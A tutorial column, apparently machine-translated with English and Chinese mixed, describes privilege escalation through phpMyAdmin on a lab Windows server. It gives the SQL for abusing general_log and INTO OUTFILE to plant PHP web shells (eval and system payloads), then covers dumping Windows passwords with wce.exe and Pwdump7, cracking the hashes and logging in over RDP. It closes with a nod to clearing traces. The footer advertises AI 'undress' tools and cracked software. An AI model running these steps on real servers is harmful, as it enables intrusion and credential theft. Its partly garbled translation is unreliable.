The following tutorial column from phpmyadmin will introduce you to the things about phpMyadmin privilege escalation. I hope it will be helpful to friends who need it!
Introduction: How to escalate privileges after learning the phpMyadmin account password during the penetration test? Read on, today I will tell you about phpMyadmin privilege escalation.
0×00 Definition
phpMyAdmin is a MySQL database management tool based on PHP and structured in Web-Base mode on the website host, allowing managers to A web interface can be used to manage MySQL databases.
0×01 Environment preparation
目标: Windows Server 2003 Enterprise x64 Edition 192.168.17.137攻击机: window7 192.168.17.132Php:5.45Mysql: 5.5.53Apache: 2.4
0×02 Start penetration
We have gone through weak passwords, blasting, and directory leaks We have learned through other channels that the account password of PhpMyadmin is root root. Next, we will escalate the rights through phpMyadmin, as close to reality as possible, and talk about more ideas.
a Collect useful information
As shown in the picture above, we can obtain the following useful information.
- 1. The operating system is windows server 2003 x86
- 2. The server is Apache 2.4.32
- 3. The default path of the website is E:\phpStudy\PHPTutorial \WWW
- 4.PHP version is 5.45
- 5.mysql version is 5.5.53
##b Detect insertion conditions
We have learned above that the default path of the website is E:\phpstudy\PHPTutorial\WWW. At this time, we definitely want to insert a backdoor file or export a shell. If we need to use one of the above two ideas, we must meet a prerequisite. The value corresponding to "secure_file_priv" cannot be empty and must be the path of the default website, so we must check the value of "secure_file_priv" in advance. phpMyadmin executes the following command:SHOW VARIABLES LIKE “secure_file_priv”;
结果如图所示:
从上图得知值为空,如果我们这时导入一句话,肯定会失败的,不信啊,那我们试试。
报错The MySQL server is running with the –secure-file-priv option so it cannot execute this statement,这是因为mysql对通过文件导入导出作了限制,默认不允许。默认value值为null,则为禁止,如果有文件夹目录,则只允许改目录下文件(测试子目录也不行)。我们思考一下看看能否设置其的路径为我们的默认网站路径,这样我们就可以导入一句话后门了。那我们试试吧。
从图得知这个变量是一个只读变量无法动态更改,那应该是只能从配置文件中更改了。到这里发现陷入了一个胡同,那常规方式不行,我们可以去使用一些骚思路,利用log日志文件插入一句话。
c 转换思路
我们首先需要检测的是MySQL全局变量(general_log、general_log file)的值。
- general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
- general log file 指的是日志的保存路径。
从图得知general_log默认是关闭的,log日志存放的位置是E:\phpStudy\PHPTutorial\MySQL\data\。
首先我们来理解一下开启general_log 的作用,开启它可以记录用户输入的每条命令,会把其保存在E:\phpstudy\PHPTutorial\MySQL\data\下的一个log文件中,其实就是我们常说的日志文件。好,我们的利用的思路是开启general_log之后把general_log_file的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。
具体命令是:
set global general_log = "ON";SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/infos.php';
Then we can see that the pseudo-diary file infos.php we generated is found in the root path of the website.
Then we have to insert our one-sentence backdoor.
select '';
We can try Use a kitchen knife to connect and the connection is successful.
d Get the administrator password
0×00 Get the plain text directly
We upload wce.exe to obtain the clear text password. With great luck, I got the clear text (a password mixed with 11 letters and numbers) directly. If you can't get the plaintext directly, you have to go to the second step to get the hash value and then decrypt it.
0×01 Get the hash value
Upload Pwdump7.exe to get the hash value and save it in the password.txt file. To obtain the hash value, you can choose to run it online at http://www.objectif-securite.ch/en/ophcrack.php. If it fails, use Ophcrack to import the rainbow table and run it.
e Check whether 3389 is enabled
Directly enter “netstat -an | find “3389″ or “netstat -an” in the chopper terminal.
Found that 3389 is not open, but 3390 is open, let’s try to connect.
f Log in to the server
Run mstsc to open the remote desktop.
Enter the account number and password obtained above and log in successfully.
In the end, the traces must be clear, but I won’t write it here. There is too much to write.
0×03 Extension
The above demonstrates the situation where the secure_file_priv value is empty, so what should we do if secure_file_priv is not empty?
a Configure the my.ini file (does not correspond to the website root path)
Open the mysq configuration file my.ini, set the value of secure_file_priv, and then restart mysql.
secure_file_priv = “E:/phpStudy/PHPTutorial/MYSQL/”
尝试改变值,发现只是可读,不能写,那种情况无法写入我们的一句话,因为其限制了导出路径,无法把一句话写入之后导出到我们的网站根目录。
b 配置my.ini文件(对应网站根路径)
打开mysq的配置文件my.ini,对secure_file_priv的值进行设置,然后重启mysql。
secure_file_priv = ”E:/phpStudy/PHPTutorial/WWW/”
然后我们尝试插入一句话后门,成功插入。
二话不说菜刀连接。
当然一句话还可以这样插入。
CREATE TABLE `mysql`.`informationes` (`inform` TEXT NOT NULL);INSERT INTO `mysql`.`informationes` (`inform`) VALUES ('<?php @eval($_POST[pass]);?>');SELECT `inform` from `mysql`.`informationes` into outfile 'e:/phpStudy/PHPTutorial/WWW/infos.php';DROP table if exists `mysql`.`informationes`;(注意: c:/phpStudy/PHPTutorial/WWW/为网站的绝对路径)
c 导出具有命令权限的Shell的php文件
select ‘\’;system($_POST[\'yumu\']);echo \’\’;?>’ into outfile ‘c:/phpStudy/PHPTutorial/WWW/test.php’;
0×04 Summary
The environment in this article is except that there is no WAF. They are as close to the real environment as possible, simulating the real environment for everyone to analyze and explain ideas. I hope everyone will gain something.
The above is the detailed content of Things about phpMyadmin privilege escalation. For more information, please follow other related articles on the PHP Chinese website!
phpMyAdmin's Function: Interacting with MySQL (SQL)May 07, 2025 am 12:16 AMphpMyAdmin simplifies MySQL database management through the web interface. 1) Create databases and tables: Use graphical interface to operate easily. 2) Execute complex queries: such as JOIN query, implemented through SQL editor. 3) Optimization and best practices: including SQL query optimization, index management and data backup.
MySQL vs. phpMyAdmin: Understanding the Key DifferencesMay 06, 2025 am 12:17 AMMySQL is a database management system, and phpMyAdmin is a web tool for managing MySQL. 1.MySQL is used to store and manage data and supports SQL operations. 2.phpMyAdmin provides a graphical interface to simplify database management.
phpMyAdmin: Accessing and Managing MySQL DatabasesMay 05, 2025 am 12:08 AMphpMyAdmin provides an intuitive interface through the browser to help manage MySQL databases. 1. Create a database and table: Enter the code in the "SQL" tab and execute it. 2. Optimize table: Use the "OPTIMIZETABLE" command to improve query performance. 3. Permission management: Use the "SHOWGRANTS" and "GRANT" commands to check and modify permissions. 4. Performance optimization: regularly optimize tables, use indexes, and avoid large-scale imports.
MySQL: The Engine, phpMyAdmin: The User InterfaceMay 04, 2025 am 12:02 AMMySQL and phpMyAdmin are powerful database tools, and their combination provides convenience for database management. MySQL's high performance, scalability and security make it the first choice for database engines, while phpMyAdmin's database management, data import and export, and user management capabilities simplify database operations. The actual case shows how they work together, and provides optimization strategies such as index optimization, query optimization, caching mechanism and phpMyAdmin configuration tuning to improve performance.
The Role of SQL in phpMyAdmin: A Deep DiveMay 03, 2025 am 12:07 AMSQL's role in phpMyAdmin is multifaceted, including data operation, database design, optimization and maintenance. 1.SQL is used for basic data operations, such as querying and inserting data. 2.SQL supports complex queries, view creation and stored procedure writing. 3. In phpMyAdmin, SQL commands are executed through the MySQL server, and the results are displayed in a table form. 4. Users can perform performance optimization through SQL, such as indexing and query optimization.
Beyond the Interface: phpMyAdmin and the Power of SQLMay 02, 2025 am 12:21 AMThe combination of phpMyAdmin and SQL allows users to directly enter and execute SQL commands, implementing more complex queries and database management. 1) In phpMyAdmin, you can execute SQL commands, such as SELECTFROMusersWHEREage>30; 2) Use the EXPLAIN command to analyze the execution plan of the query and optimize performance; 3) By creating indexes, avoiding SELECT and using LIMIT, the query efficiency can be significantly improved.
phpMyAdmin: Managing SQL Databases with EaseMay 01, 2025 am 12:24 AMphpMyAdmin is a tool for managing MySQL and MariaDB databases through a web interface. 1) Create a database: Use the CREATEDATABASE command. 2) Create table and insert data: Use the CREATETABLE and INSERTINTO commands. 3) Create a view: Use the CREATEVIEW command to simplify querying. 4) Optimize table: Use the OPTIMIZETABLE command to improve query speed.
Is phpMyAdmin a Database? Clarifying Its RoleApr 30, 2025 am 12:13 AMphpMyAdminisnotadatabase;it'saweb-basedtoolformanagingMySQLandMariaDBdatabases.Itoffersfeatureslikecreating/modifyingdatabases,executingSQLqueries,managingusers/permissions,andimporting/exportingdata.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
Notepad++7.3.1
Easy-to-use and free code editor
EditPlus Chinese cracked version
Small size, syntax highlighting, does not support code prompt function
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
